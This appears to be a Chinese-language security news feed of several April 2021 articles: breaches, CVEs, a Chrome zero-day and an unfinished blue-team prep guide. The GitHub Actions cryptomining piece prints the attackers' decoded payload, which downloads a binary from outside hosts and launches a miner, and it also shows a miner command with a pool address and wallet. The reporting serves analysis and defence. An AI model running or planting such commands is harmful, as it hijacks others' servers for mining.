该漏洞是一个已经公开披露的安全漏洞,但在当前的浏览器版本中还没有修补。Agarwal表示,在最新版本的V8 JavaScript引擎中该漏洞已经被修复,但目前还不清楚谷歌何时会更新Chrome浏览器。

好消息是,Chrome浏览器沙盒可以拦截该漏洞。但如果该漏洞与另一个漏洞进行链锁,就有可能躲过Chrome沙盒的检测。

Chrome浏览器的沙盒是一道安全防线,可以防止远程代码执行漏洞在主机上启动程序。

为了测试该漏洞,研究者关闭了浏览器Edge 89.0.774.76版本和Chrome 89.0.4389.114版本的沙盒。在沙盒被禁用的情况下,该漏洞可以在研究者的Windows 10设备上远程启动计算器。

有研究人员认为,该漏洞与Dataflow Security的安全研究人员Bruno Keith和Niklas Baumstark,在Pwn2Own 2021黑客大赛上使用的漏洞相同,研究人员利用它入侵了谷歌Chrome和微软Edge。(注:Bruno Keith和Niklas Baumstark在大赛上通过Typer Mismatch错误,成功利用Chrome渲染器和Edge,获得了10万美金的收入。)

谷歌预计在4月14日发布Chrome 90版本,希望在该版本中漏洞已被修复。有媒体已经就该漏洞向谷歌致信,但还未收到回复。

9999.jpg

]]>
ParkMobile泄密事件暴露了2100万用户的车牌数据和手机号码 Thu, 22 Apr 2021 23:10:26 +0800        据知名网络安全新闻网站KrebsOnSecurity报道,有人正在网络犯罪论坛上出售在北美颇受欢迎的移动停车应用ParkMobile的2100万客户的账户信息。被盗数据包括客户的电子邮件地址、出生日期、电话号码、车牌号、哈希密码和邮寄地址。

BT%QE_O7JRC(29TK86X9@JL.png

KrebsOnSecurity首次从纽约市的威胁情报公司Gemini Advisory那里听说了这一漏洞,该公司密切关注网络犯罪论坛。Gemini在一个俄语犯罪论坛上分享了一个新的销售线索,在附带的被盗数据截图中包含了一些用户的ParkMobile账户信息、电子邮件地址和电话号码,以及车辆的车牌号。

当被问及销售线索时,总部位于亚特兰大的ParkMobile表示,该公司在3月26日发布了一则通知,内容是 "发生了一起网络安全事件,与我们使用的一款第三方软件的漏洞有关"。

“作为回应,我们立即在一家领先的网络安全公司的协助下展开调查,以解决这一事件,”通知中写道。“出于谨慎起见,我们也已经通知了相关执法部门。调查还在进行中,我们目前能提供的细节有限。”

~RJQ20`D]H9Z3$%MLBKR}HE.png

声明还指出:“我们的调查表明,我们加密的敏感数据或支付卡信息均未受影响。同时,自从了解到该事件以来,我们还采取了其他预防措施,包括消除第三方漏洞,维护我们的安全性以及继续监视我们的系统。”

当被要求澄清攻击者确实获取了什么信息时,ParkMobile证实其中包括基本的账户信息--车牌号,如果提供,还包括电子邮件地址或电话号码等。

"在一小部分情况下,可能会有邮寄地址,"发言人Jeff Perkins说。

ParkMobile并不存储用户密码,而是存储了一种相当强大的单向密码哈希算法的输出,这种算法被称为bcrypt,它比MD5等常见的替代方案更耗费资源,破解成本更高。从ParkMobile窃取并出售的数据库包括每个用户的bcrypt哈希值。

"你说的没错,bcrypt哈希值和‘加盐’密码都被获得了,"当被问及数据库销售线程中的截图时,Perkins说。

"注意,我们的系统中并没有保留加盐值,"他说。"此外,被泄露的数据不包括停车历史、位置历史或任何其他敏感信息。我们不会向用户收集社会安全号码或驾驶执照号码。"

ParkMobile表示,它正在最后确定其支持网站的更新,以确认其调查的结论。但不知道其有多少用户甚至知道这次安全事件。3月26日的安全通知似乎没有链接到ParkMobile网站的其他部分,而且该公司最近的新闻稿列表中也没有它。

同样令人好奇的是,ParkMobile并没有要求或强迫其用户更改密码作为预防措施。安全研究人员使用ParkMobile应用来重置密码,但应用中没有任何信息提示这是一件及时的事情。

这次数据泄露事件对ParkMobile来说是在一个关键的时刻发生的。3月9日,欧洲停车集团EasyPark宣布计划收购该公司,该公司在北美450多个城市运营。

9999.jpg



]]>
伊朗核设施遭遇网络攻击 Thu, 22 Apr 2021 23:10:26 +0800

据Security Week报道,德黑兰以南的伊朗核设施近日遭到了网络攻击。

640 (3).png

伊朗首席核官员阿里·阿克巴·萨利希(Ali Akbar Salehi)称,对纳坦兹(Natanz)核设施的袭击发生在伊朗发布用于浓缩铀的新设备的第二天。在4月10日的电视直播中,该国总统哈桑·鲁哈尼(Hassan Rouhani)在纳坦兹举行了新的离心机揭幕仪式。


根据美国科学家联合会的说法,离心机可能引起严重的核武器扩散问题,“因为用于浓缩核反应堆的铀的机器也可以用来浓缩用于核弹的铀。”


萨利希称这次袭击是“破坏”伊朗核计划的“恐怖袭击”。他没有说明是谁对此事件负责,但以色列公共媒体引用的情报来源将这次袭击归因于以色列。


以色列公共广播公司Kan和Haaretz则报道说纳坦兹事件是由以色列网络攻击人员造成的大停电。


以色列发出的有关伊朗核计划危险的警告最近有所增加,但是以色列尚未就纳坦兹袭击事件公开发表评论。


伊朗国家电视台引用萨利希的话说:“伊朗谴责这一卑鄙的举动,强调国际社会和国际原子能机构必须处理这一核恐怖主义,伊朗保留对肇事者采取行动的权利。”


根据2015年核协议的条款,伊朗只能生产和储存数量有限的浓缩铀。该协议还限制了该国对重金属的使用,只能用于商业电厂的燃料生产。


伊朗原子能组织(AEOI)发言人贝鲁兹·卡马尔文迪(Behrouz Kamalvandi)周日表示,纳坦兹工厂的电网受到4月11日上午“事件”的影响。他向伊朗通讯社法尔斯保证,该综合设施“没有人员伤亡或泄漏”。


国际原子能机构尚未对纳坦兹事件发表评论。

9999.jpg

]]>
安全周报(04.5-04.11) Thu, 22 Apr 2021 23:10:26 +0800

1、酒店社交APP涉黄


近年来,网络“拼住”App悄然盛行。不过,在“酒店社交”外衣、“共享”外壳之下,内里却有着赤条条的情色交易。近日,有媒体调查发现,在一款名为“趣住”的酒店社交App上,充斥着大量“约炮”信息和“拉皮条”账号。

据“趣住”官方介绍,App定位的用户人群为“出差人群”,平台以酒店为单位,每家酒店都设有单独的留言墙和聊天室。借此,用户可以“搭讪”同住一家酒店且“独自居住”的房客。

在“趣住”App中,有众多北上广等一线城市的豪华酒店的留言墙和聊天室活跃度较高。在这些留言中,发布者九成使用女性身份,发布照片多以身体部位特写为主,性暗示意味明显,还有发布者疑似未成年用户。而众多疑似“拉皮条”账号,也将自身包装成“交友平台客服”混迹于其中。


640.webp (2).jpg


说到底,网络并非法外之地。无论是平台,还是利用平台发布违规信息进行非法色情交易的,一旦逾越了法律和道德的底线,就理应受到法律的严惩。


2、5亿LinkedIn用户倒霉,个人信息泄露

据Cyber News报道,LinkedIn信息大规模泄露,影响5亿用户,目前信息已经被攻击者拿到网上出售。LinkedIn新闻发言人证实,出售的信息的确来自LinkedIn。LinkedIn新闻发言人在声明中表示:


“我们正在调查,网上发布的数据集看起来包含LinkedIn公开可浏览信息,还包括来自其它网站或者企业的聚合信息。从LinkedIn收集会员数据违反我们的服务条款,我们一直在努力,希望保护好会员和会员数据。”


640.webp (3).jpg

目前LinkedIn约有用户7.4亿,也就是说受影响的用户约占总用户数的三分之二。泄露的信息包括用户ID、名称、邮件地址、手机号码、工作信息、性别、其它社交媒体账户。

安全情报公司IntSights的分析师保罗·普鲁德霍姆(Paul Prudhomme)指出,泄露的数据影响巨大,因为作恶者可以利用员工信息攻击企业。


3、Cyberhouse数据泄露:130万名用户信息被免费挂到网上

据外媒cybernews报道,在从Facebook和LinkedIn上收集的超10亿个人资料的数据在网上公开出售几天后,现在似乎轮到Clubhouse了。这个正在冉冉升起的平台似乎也经历了同样的命运,一个包含130万Clubhouse用户记录的SQL数据库在一个人气黑客论坛上被免费泄露。


640.png

据悉,泄露的数据库包含了Clubhouse档案中的各种用户相关信息,包括用户ID、名字、照片URL、用户名、Twitter、Instagram处理、关注者的数量、被关注的用户数量、帐号创建日期、受用户配置文件名的邀请。

数据泄露示例:
640 (1).png


4、黑客用GitHub服务器挖矿:三天跑了3万个任务

加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿?黑客们动起了歪心思——“白嫖”服务器。给PC植入挖矿木马,已经无法满足黑客日益增长的算力需求,如果能用上GitHub的服务器,还不花钱,那当然是极好的。


640 (2).png
而且整个过程可能比侵入PC还容易,甚至都不需要程序员上当受骗。只需提交Pull Request(PR),即使项目管理者没有批准,恶意挖矿代码依然能够执行。

原理也很简单,利用GitHub Action的自动执行工作流功能,轻松将挖矿程序运行在GitHub的服务器上。

早在去年11月,就已经有人发现黑客这种行为。更可怕的是,半年过去了,这种现象依然没得到有效制止。


]]>
Clubhouse约130万个人用户信息被泄露 Thu, 22 Apr 2021 23:10:26 +0800 4月11日消息,据外媒消息,美国语音社交平台Clubhouse的130万用户的个人数据被泄露到一个著名的黑客论坛上。

此次泄露的数据包括用户的姓名、社交媒体帐号名称和其他细节。据悉,这些数据可以帮助不法分子针对用户发起钓鱼攻击或身份盗窃。Clubhouse尚未对此置评。

Clubhouse成立于2020年3月,目前仅能通过邀请机制注册,但已经成为吸引数百万用户的热门平台。用户可以通过该公司的语音社区针对各种主题启动对话或开设“房间”。有报道称,Clubhouse正在以40亿美元的估值展开融资谈判。

9999.jpg

]]>
CISA发布公告提醒通用电气电源管理设备存在安全缺陷 Thu, 22 Apr 2021 23:10:26 +0800 美国网络安全与基础设施安全局(CISA)通告,通用电气生产的 Universal Relay(UR)系列电源管理设备中存在严重的安全漏洞。

通用电气的 Universal Relay 系列设备是“简化电源管理以保护关键资产的基础”。允许用户控制各种设备消耗的电力,UR 系列设备允许将设备切换到不同的电源模式(设备在不同电源模式下有不同的使用特性)。通用电力已经针对以下受影响的设备发布了补丁程序:B30、B90、C30、C60、C70、C95、D30、D60、F35、F60、G30、G60、L30、L60、L90、M60、N60、T35 和 T60。

CISA 在公告中提示,如果不进行更新可能导致攻击者利用漏洞访问敏感信息、重新启动 Universal Relay 系列设备、执行提权或者导致拒绝服务

鉴于这些设备控制着电力的流向,这些缺陷带来的影响是很大的。通用电力强烈建议受影响的用户将固件更新到 8.10 或者更高版本,以此加固存在的漏洞。

安全缺陷

通用电气在受影响的设备上一口气修复了 9 个漏洞,其中最严重的漏洞(CVE-2021-27426)的 CVSS 评分为 9.8,该漏洞由于默认变量初始化方式不安全。

1616571135_605aeaff2c3651a1500e6.png!small?1616571135054

根据 IBM 的描述,受影响的设备可以允许攻击者远程绕过安全限制,通过发送特定的请求就可以利用此漏洞,且漏洞利用的水平要求不会很高。

另一个严重的漏洞(CVE-2021-27430)由于 7.00、7.01 和 7.02 版本的 UR 设备在加载程序文件时包含硬编码的凭据。本地攻击者可以利用该漏洞重新启动 UR 设备来改变启动顺序,该漏洞的 CVSS 评分为 8.4。

1616571170_605aeb227c8a63059d514.png!small?1616571170599

漏洞(CVE-2021-27422)在 UR 设备上通过 HTTP 访问 Web 接口,无需身份验证就可以得到敏感信息。

1616571194_605aeb3a1ddbfb0116bdb.png!small?1616571193984

漏洞(CVE-2021-27428)基于 UR 设备上的配置管理工具的缺陷使远程攻击者可以上传任意文件,也可以利用此漏洞在没有权限的情况下升级固件。

1616571214_605aeb4e3707854730e82.png!small?1616571214058

立刻修复

这些漏洞在 7 月被发现,由 Industrial 和 VuMetric 报告给了通用电气公司。通用电气在 12 月 24 日推出了修复漏洞的 8.10 固件版本,上周这些漏洞已经被公开披露,故而 CISA 督促用户抓紧进行更新升级。

同时,CISA 还建议将 UR IED 设备放置在公司网络安全保护覆盖范围内,利用访问控制、入侵监控和其他多种技术来进行纵深防御。

1616571299_605aeba34951c7e09e6aa.png!small?1616571299545

去年 12 月,通用电气生产的医疗设备 GE Healthcare 中发现了漏洞,攻击者可以利用漏洞对人的健康数据(PHI)进行访问和更改,甚至直接关闭机器。

9999.jpg

]]>
83%的企业曾遭受固件攻击,仅29%分配了固件防护预算 Thu, 22 Apr 2021 23:10:26 +0800 近日,微软发布了名为《Security Signals》的研究报告。报告显示,过去两年中,83%的组织至少遭受了一次固件攻击,而只有29%的组织分配了预算来保护固件

image.png-89.3kB

调查中大部分公司都表示,他们是固件攻击的受害者,但相关保护的支出是相当滞后的。微软调查了来自中国、德国、日本、英国和美国的1000个企业安全决策者,组织的大多数安全投资都用于安全更新、漏洞扫描和高级威胁防护。

许多组织仍担心恶意软件访问其系统以及检测威胁的难度,而固件更难以监视和控制,缺乏意识和缺乏自动化也加剧了固件漏洞的威胁。

image.png-46.4kB

固件是一类特定的计算机软件,可为设备的特定硬件提供底层控制。因为固件通常会包含敏感信息,例如凭据和加密密钥,所以固件通常会成为攻击者的目标。美国国家标准技术研究院(NIST)的国家漏洞数据库(NVD)的数据也证实了这一问题,在过去的四年中,针对固件的攻击增加了五倍以上

对固件保护技术的投资也是不够的,如内核数据保护(KDP)或内存加密。

“基于硬件的安全性功能可阻止恶意软件或恶意攻击者破坏操作系统的内核内存或在运行时读取该内存,这是针对内核的复杂攻击的准备”——报告显示。“只有36%的企业投资于基于硬件的内存加密,而不到一半(46%)的企业投资于基于硬件的内核保护”。

image.png-119.8kB

报告同时显示,有21%的决策者承认他们无法监控固件数据。接受微软调查的受访者中有82%承认他们没有资源来防止固件攻击

基于硬件的攻击越来越多,例如针对Thunderbolt端口的ThunderSpy攻击,该攻击使用直接内存访问(DMA)功能来入侵访问Thunderbolt控制器的设备。

安全团队将41%的时间花费在可以自动化的固件补丁上。幸运的是,对固件风险的认识水平正在提高,从而推动了对该领域的更多投资

image.png-112.4kB

“接受调查的德国公司中有81%准备并愿意投资,相比之下,中国公司的95%和美国,英国和日本的91%的公司表示要对此进行投资。尽管金融服务行业的公司不如其他行业的公司那么容易做出决定,但有89%的受监管行业公司感到愿意并有能力投资于安全解决方案”。

9999.jpg

]]>
Cyberhouse数据泄露:130万名用户信息被免费挂到网上 Thu, 22 Apr 2021 23:10:26 +0800        据外媒cybernews报道,在从Facebook和LinkedIn上收集的超10亿个人资料的数据在网上公开出售几天后,现在似乎轮到Clubhouse了。这个正在冉冉升起的平台似乎也经历了同样的命运,一个包含130万Clubhouse用户记录的SQL数据库在一个人气黑客论坛上被免费泄露。

Clubhouse forum post.png

据悉,泄露的数据库包含了Clubhouse档案中的各种用户相关信息,包括用户ID、名字、照片URL、用户名、Twitter、Instagram处理、关注者的数量、被关注的用户数量、帐号创建日期、受用户配置文件名的邀请。

数据泄露示例:

据了解,这些泄露文件中的数据可以被威胁者以多种方式利用来对付Clubhouse的用户:

实施有针对性的网络钓鱼或其他类型的社会工程攻击;

强行输入Clubhouse档案的密码。

泄漏的SQL数据库只包含Clubhouse的个人资料信息--我们没有在威胁行为者发布的档案中发现任何深度敏感的数据如信用卡详细信息或法律文件。话虽如此,即使是一个个人资料名加上用户跟其他社交媒体资料的联系,也足以让一个有能力的网络罪犯造成真正的伤害。

特别确定的攻击者可以将泄漏的SQL数据库中的信息跟其他数据泄露结合起来从而创建潜在受害者的详细资料。有了这些信息,他们就可以进行更令人信服的网络钓鱼和社会工程攻击,甚至可以对信息已被黑客论坛曝光的人实施身份盗窃。

如果怀疑自己的Clubhouse资料可能被威胁者泄露那么可以执行由外媒cybernews提供的建议:

使用他们的个人数据泄露检查程序来查明自己的电子邮件是否曾经被泄露;

提防可疑的Clubhouse信息和陌生人的连接请求;

更改自己的Clubhouse账号密码;

考虑使用密码管理器来创建强密码并安全地存储它们;

在自己的所有在线账号上启用双重身份验证(2FA)。

同时,要警惕潜在的网络钓鱼邮件和短信。同样,不要点击任何可疑的东西也不要回复任何自己不认识的人。

外媒cybernews表示,他们仍在对Clubhouse泄露事件调查。

9999.jpg

]]>
黑客用GitHub服务器挖矿:三天跑了3万个任务 代码惊现中文 Thu, 22 Apr 2021 23:10:26 +0800 加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿?黑客们动起了歪心思——“白嫖”服务器。给PC植入挖矿木马,已经无法满足黑客日益增长的算力需求,如果能用上GitHub的服务器,还不花钱,那当然是极好的。

而且整个过程可能比侵入PC还容易,甚至都不需要程序员上当受骗。只需提交Pull Request(PR),即使项目管理者没有批准,恶意挖矿代码依然能够执行。

原理也很简单,利用GitHub Action的自动执行工作流功能,轻松将挖矿程序运行在GitHub的服务器上。

早在去年11月,就已经有人发现黑客这种行为。更可怕的是,半年过去了,这种现象依然没得到有效制止。

GitHub心里苦啊,虽然可以封禁违规账号,但黑客们玩起了“游击战术”,不断更换马甲号逃避“追捕”,让官方疲于奔命。

就在几天前,一位荷兰的程序员还发现,这种攻击方式依然存在,甚至代码里还出现了中文。

那么,这些黑客是如何植入挖矿程序的呢?一切要从发现异常的法国程序员Tib说起。

PR异常让程序员起疑心

去年11月,Tib发现,自己在一个没有参加的repo上收到了PR请求。而且在14个小时内就收到了7个,全是来自一个“y4ndexhater1”的用户,没有任何描述内容。

令人感到奇怪的是,这并不是一个热门项目,Star数量为0。

打开项目主页发现,内容是Perl项目的github action、circle ci、travis-ci示例代码集合,整个README文档一团糟,根本不像一个正经的开源项目。

然而就是这个混乱又冷门的repo,居然在3天里被fork了2次。

一切都太不正常了,让人嗅到了一丝不安的气息。

尝试“作死”运行

本着“作死”的精神,Tib决定一探究竟。

经过那位可疑用户的操作,Tib所有的action都被删除,在工作流里被加入了一个ci.yml文件,内容如下:

当Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt这一行内容后,立刻从沙发上跳了起来,他意识到事情的严重性:有人在入侵他的GitHub个人资料!

这串看似神秘的字符,其实是base64编码,经过翻译后,得到了另一段代码:

apt update -qq

apt install -y curl git jq

curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog

ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')

chmod u+x prog

timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

前面两行不必解释,有意思的地方从第三行开始,它会下载一个prog二进制文件。

为了安全起见,Tib先尝试获取信息而不是执行,得到了它的十六进制代码。

$ objdump -s --section .comment prog

prog: file format elf64-x86-64

Contents of section .comment:

0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.

0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1

0020 20323032 30313230 3300 20201203.

Tib也考虑过反编译,但是没有成功。

不入虎穴,焉得虎子,Tib决定尝试运行一下。

要执行这一大胆而又作死的任务,防止“试试就逝世”,Tib首先断开了电脑的网络链接,并选择在Docker容器中运行。

答案终于揭晓,原来这个prog是一个名为XMRig的挖矿程序。

$ ./prog --version

XMRig 6.8.1

built on Feb 3 2021 with GCC 10.2.1

features: 64-bit AES

libuv/1.40.0

OpenSSL/1.1.1i

hwloc/2.4.0

当时XMRig的最新版恰好是6.8.1,和上面的版本参数符合。不过用SHA256检测后发现,这个prog并不完全是XMRig,Tib预测它可能是一个修改版。

实际上,可能被攻击的不止GitHub,安全公司Aqua推测,像Docker Hub、Travis CI、Circle CI这些SaaS软件开发环境,都可能遭受这类攻击。

在这个攻击过程中,会派生一个合法的repo,负责将恶意的GitHub Action添加到原始代码。然后,黑客再向原始repo提交一个PR,将代码合并回原始repo。

下载的挖矿程序会伪装成prog或者gcc编译器,通过提交PR在项目执行自动化工作流。此时服务器将运行伪装后的挖矿程序。

这些攻击者仅一次攻击就可以运行多达100个挖矿程序,从而给GitHub的服务器带来了巨大的计算量。

据Aqua估计,仅在三天的时间里,挖矿黑客就在GitHub上有超过2.33万次commit、在Docker Hub上5.8万次build,转化了大约3万个挖矿任务。

可以防范但很难根除

这种攻击甚至不需要被攻击的仓库管理者接受恶意Pull Request。

只要在.github/workflows目录里面的任意.yml文件中配置了在收到Pull Request时执行,来自黑客的Action就会自动被执行

如果你没有使用这个功能,那就不用担心啦,黑客大概也不会找上你。

需要用到这个功能的话,可以设置成只允许本地Action或只允许Github官方及特定作者创建的Action。

将情况反馈给客服后,GitHub会对恶意账号进行封号和关闭相关Pull Request的操作。

但恶意攻击很难被根除,黑客只需要注册新的账号就可以继续白嫖服务器资源。

攻击还在继续

我们从最近一次攻击中发现,黑客将挖矿程序上传到GitLab并伪装成包管理工具npm。

打开这个可疑的nani.bat,可以看到:

npm.exe --algorithm argon2id_chukwa2

--pool turtlecoin.herominers.com:10380

--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP

--password xo

这一次黑客挖的是乌龟币*(TurtleCoin)*,可使用CPU计算。按当前价格挖出四千多个币才值1美元。

Github Actions的免费服务器可以提供英特尔E5 2673v4的两个核心,7GB内存。

大致估算单台运行一天只能获利几美分,而且黑客的挖矿程序通常只能在被发现之前运行几个小时。比如Docker Hub就把自动build的运行时间限制在2个小时。

不过蚊子再小也是肉,黑客通过寻找更多接受公开Action的仓库以及反复打开关闭Pull Request就能执行更多的挖矿程序。

同一黑客账号至少攻击了95个GitHub仓库

正如Twitter用户Dave Walker所说的,如果你提供免费的计算资源,就要做好会被攻击和滥用的觉悟。挖矿有利可图的情况下这是不可避免的。

据报道,受害的不止GitHub,还有Docker Hub、Travis CI以及Circle CI等提供类似服务的持续集成平台。

这一乱象不知何时才能结束,唯一的好消息可能就是,挖矿的黑客似乎只是针对GitHub提供的服务器资源,而不会破坏你的代码。

但是GitHub Action的漏洞不止这一个。还有方法能使黑客读写开发者的仓库,甚至可以读取加密的机密文件。

去年7月,Google Project Zero团队就已向GitHub通报漏洞。但在给出的90天修复期限+延长14天后,GitHub仍未能有效解决。

对此,我们的建议是,不要轻易相信GitHub市场里的Action作者,不要交出你的密匙。

9999.jpg

]]>
央视曝光:二手手机恢复出厂设置后数据仍能恢复 有专人做此生意 Thu, 22 Apr 2021 23:10:26 +0800        很多人在出掉手机之前会将手机恢复出厂设置,通过这项操作把手机上的个人信息删除,但是这样做真能把数据清空吗?4月10日消息,央视财经频道曝光了二手手机市场交易背后的灰色产业链。据悉,网络交易平台上许多商家利用一种名叫取证系统的终端设备,它能够完整获取手机中存在、隐藏以及删除的数据。

只要你的手机内部硬盘没有损坏,即使将手机系统清空并恢复出厂设置,也一样可以恢复手机数据。

专家表示,侵犯个人信息常常是电信诈骗、敲诈勒索、恶意注册账号等一系列违法犯罪的源头。数据泄露会造成用户人身财产受到威胁,不法分子通过将手机数据恢复收集人们的个人信息,经过筛选分析用户特征,从事电信诈骗、非法讨债甚至绑架勒索等精准犯罪活动。

9999.jpg

]]>
包含大量信用卡记录和社会安全号码的Swarmshop数据库遭泄露 Thu, 22 Apr 2021 23:10:26 +0800        据外媒BGR报道,近年来数据泄露事件频繁发生。Facebook就是其中的一个例子,上周末该社交网络被爆出遭遇了又一次令人尴尬的大规模数据泄露事件--涉及106个国家超过5.33亿Facebook用户的个人信息,该社交网络仍在网上面临着猛烈的批评。而近日发生了一些黑客在线泄漏其他黑客的数据库的事件。

pic10@2x.jpg

知名网络安全公司Group-IB周四发布了一份报告,记录了Swarmshop--被描述为被盗个人和支付记录(如信用卡数据)的 "社区 "商店--如何看到其用户和管理员数据的主要缓存在网上泄露到另一个地下黑客论坛。恰如其分地,Group-IB报告总结这里发生的事情的标题是 "What Goes Around Comes Around"(善有善报,恶有恶报)。

根据这份报告,在另一个地下论坛上发布的Swarmshop数据库包含了12344条卡店管理员、卖家和买家的记录。这是根据Group-IB提供的推文线索获得的,该推文还指出,这个数据库还 "暴露了网站上所有被泄露的交易数据,包括623036条支付卡记录、498套网上银行账户凭证和69592套美国社会安全号码和加拿大社会保险号码"。

pic11@2x.jpg

鉴于Swarmshop所代表的数据库的性质,这可能并不令人感到惊讶,这也不是第一次被盗的数据中心发现自己处于其他网络犯罪分子的目标。2020年1月,该网站的记录在一个地下论坛上被泄露,据说是由一个出于报复动机的用户。同时,以下是外媒知道的关于这次新泄露事件的其他情况--数据转储包括超过62.3万张支付卡的记录,其中近63%是由美国银行发行的。

"虽然地下论坛被黑客攻击的情况时有发生,但卡店数据泄露事件并不常见,"Group-IB首席技术官Dmitry Volkov说。"除了买家和卖家的数据外,这种数据泄露行为还暴露了大量被泄露的普通用户的支付和个人信息。虽然来源仍然不明,但一定是那些报复性黑客案件之一。由于所有卖家都失去了他们的货物和个人数据,这对卡店来说是一个重大的声誉打击。该店不太可能恢复状态。"

9999.jpg

]]>
5亿LinkedIn用户倒霉 个人信息泄露 Thu, 22 Apr 2021 23:10:26 +0800        据Cyber News报道,LinkedIn信息大规模泄露,影响5亿用户,目前信息已经被攻击者拿到网上出售。LinkedIn新闻发言人证实,出售的信息的确来自LinkedIn。LinkedIn新闻发言人在声明中表示:

“我们正在调查,网上发布的数据集看起来包含LinkedIn公开可浏览信息,还包括来自其它网站或者企业的聚合信息。从LinkedIn收集会员数据违反我们的服务条款,我们一直在努力,希望保护好会员和会员数据。”

Screenshot-2021-04-08-150024.jpg

目前LinkedIn约有用户7.4亿,也就是说受影响的用户约占总用户数的三分之二。泄露的信息包括用户ID、名称、邮件地址、手机号码、工作信息、性别、其它社交媒体账户。

攻击者在黑客论坛出售数据,他提供200万条记录作为样本。Cyber News研究人员证实数据的确来自LinkedIn用户,但他们提醒说信息可能来自旧档案,并非最近的资料。

安全情报公司IntSights的分析师保罗·普鲁德霍姆(Paul Prudhomme)指出,泄露的数据影响巨大,因为作恶者可以利用员工信息攻击企业。普鲁德霍姆说:“大流行期间,越来越多的员工远程办公,家庭、个人设备使用频率增加,类似的攻击可能性提升。通过员工个人账户和设备攻击企业,这是攻击者绕开企业网络安全防御屏障的一种方式。”

就在几天前Facebook刚刚证实泄露大量数据,影响5.3亿用户。

9999.jpg

]]>
酒店社交APP涉黄,无异玩火自焚 Thu, 22 Apr 2021 23:10:26 +0800

酒店社交听起来新潮,但仔细想想,却难免暗藏“祸心”。在酒店这样的偏私域环境中,大搞陌生人社交,本身就让人心怀警惕。

近年来,网络“拼住”App悄然盛行。不过,在“酒店社交”外衣、“共享”外壳之下,内里却有着赤条条的情色交易。近日,有媒体调查发现,在一款名为“趣住”的酒店社交App上,充斥着大量“约炮”信息和“拉皮条”账号。

据“趣住”官方介绍,App定位的用户人群为“出差人群”,平台以酒店为单位,每家酒店都设有单独的留言墙和聊天室。借此,用户可以“搭讪”同住一家酒店且“独自居住”的房客。

然而,记者查找发现,在“趣住”App中,有众多北上广等一线城市的豪华酒店的留言墙和聊天室活跃度较高。在这些留言中,发布者九成使用女性身份,发布照片多以身体部位特写为主,性暗示意味明显,还有发布者疑似未成年用户。而众多疑似“拉皮条”账号,也将自身包装成“交友平台客服”混迹于其中。

快评丨酒店社交APP涉黄,无异玩火自焚

↑趣住App上的性暗示内容。图据南方都市报

不得不说,酒店社交听起来新潮,但仔细想想,却难免暗藏“祸心”。在酒店这样的偏私域环境中,大搞陌生人社交,本身就让人心怀警惕。

事实上,酒店社交本身就暗藏诸多隐患,如所谓的共享拼房,本身就是对酒店管理安全的一种挑战。根据公安部发布的《旅馆业治安管理办法》相关规定,旅客不得私自留客住宿或者转让床位。对照下来,酒店社交的这套“玩法”显然是在打相关法规的擦边球。

更重要的是,由于酒店社交定位于“酒店”,涉及住宿等隐秘信息,因而该APP也极有可能被用作开展招嫖、卖淫等违法活动的工具。从趣住APP“搭讪独自住酒店的小姐姐”“私聊约约看”“结婚要房,约会要床”等宣传标语看,这款App本身就可能有以性暗示等话题来吸睛引流的目的。

此前,陌陌等众多陌生人交友软件,因其中暗含大量“约炮”“招嫖”等信息,曾受到严加整治与监管。陌生社交行业发展到现在,整体而言,已经步入健康发展的轨道。如今,酒店社交又踏浪而来,若是想着逃避监管,为“招嫖”“约炮”提供温床,显然为法律所不许。

其实,酒店社交APP被曝光、整治,此前也有先例。据媒体披露,在2018年,包括“睡睡”“趣住”“芝麻拼房”等多款酒店社交App就因涉及色情信息被曝光,只不过,“睡睡”“芝麻拼房”均已下线,但“趣住”依然正常运营。显然,对于这类新兴的社交平台,还有必要让监管网络进一步织密。

需要追问的是,在这一平台模式下,酒店是否与平台有合作?从报道来看,相关酒店似乎对此类情况并不知情,也尚未采取相关应对措施。他们可能还未意识到,这种新型的互联网社交模式给酒店的管理、安全带去了隐患。

根本而言,酒店社交平台如果想步入健康发展轨道,就该担起信息安全管理的主体责任来,加强内容管理,健全用户信息安全保护的机制,并实行用户实名登记制度。如果酒店社交的运营逻辑,本身就是以“约炮”“招嫖”为核心,那这种所谓的新业态不要也罢。

说到底,网络并非法外之地。无论是平台,还是利用平台发布违规信息进行非法色情交易的,一旦逾越了法律和道德的底线,就理应受到法律的严惩。“睡睡”们已下了线,“趣住”若再玩火,终会自焚。

9999.jpg

]]>
HVV大型攻防演练检测篇 Thu, 22 Apr 2021 23:10:26 +0800 HVV行动作为国家级攻防演练具有重大意义,旨在通过检验单位网络和信息基础设施的安全防护、应急处置和指挥调度能力,提高信息系统的综合防御能力。而要打好一场完美的防守战役应该先从组织本身的脆弱性整改开始,其整改工作应该具备全局性视图。

本文将主要从HVV行动第一阶段,即准备阶段时涉及到的检测内容和要点进行梳理和分析,并给出相应的加固建议。

一、整体安全整改

从整体整改视图出发,到梳理相关资产,发现相关风险,以此开展相应工作等整体安全加固能全面有序的帮助大家度过前期的安全整改工作,为HVV攻防演练奠定坚实基础。

二、资产梳理

资产梳理作为整体安全建设基础,应该做到全面梳理,因为资产梳理做得是否全面将直接影响后续风险排查是否彻底。全面的资产排查应从内、外网,软、硬件,人员配备,以及安全管理制度等多方面进行梳理。资产的排查可以从多维度进行交叉排查,应该做到“宁可多查,不可漏查”,大致可以分为以下几个类别:互联网暴露资产、业务资产、硬件资产、软件资产、办公资产等类型。

三、互联网暴露面缩减

互联网暴露面作为流量的入口,是攻击方重点收集的目标,也是攻击方重要的攻击对象,因此降低互联网资产风险是蓝队最主要的工作。互联网资产风险范围包括对外业务(如官网、APP及其它应用系统)的漏洞、对外开放的测试环境、VPN系统、公有云上系统、以及共享在外的代码(githup、百度云盘等公共仓库里共享的代码)等。

互联网暴露面排查方式:

外网资产信息收集;

子域名探测;

